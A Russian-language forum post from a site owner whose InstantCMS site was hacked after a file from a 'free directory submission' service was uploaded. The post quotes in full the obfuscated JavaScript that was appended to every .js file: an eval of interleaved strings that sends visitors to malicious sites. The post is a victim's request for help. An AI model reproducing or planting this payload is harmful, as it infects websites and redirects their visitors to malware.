Прошу помочь решить проблему с уязвимостью от вируса

Всем привет, подскажите пожалуйста, у меня сайт на INSTATCMS ВЕРСИИ v1.10.1 да понимаю что она уже устарела, но проблема не в этом у меня такая проблема купился мой братец на бесплатную услугу по прогону сайта по каталогам, сайт вообщем его, но я ему помогаю.., вот в итоге он сделал все по инструкции как было описана на сайте http://progon.site/ залил в корень сайта файлик который и приоткрыл дверь Хакером, для внедрения своего кода, теперь сайт был исчез из поиска + срабатывает периадресация с сайта на сайты-вирусы и происходит это по сценарию..
в итоге я обнаружил что все файлы с расширением .js были заражены и в конце был вставлен код

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

прошерудил весь сайт удалил везде, еще раз переправерил скриптом для поиска данного кода. в итоге избавились от этой заразы, сменили все данные от хоста, сайт вновь начал индексироваться поисковиками, и как вдруг снова эта зараза заразила все файлы, снова все удалил, однако я так понимаю что где то все же есть уязвимость после первого инцидента что, снова сайт был поражен. Прошу всех знатоков помочь с данной проблемой..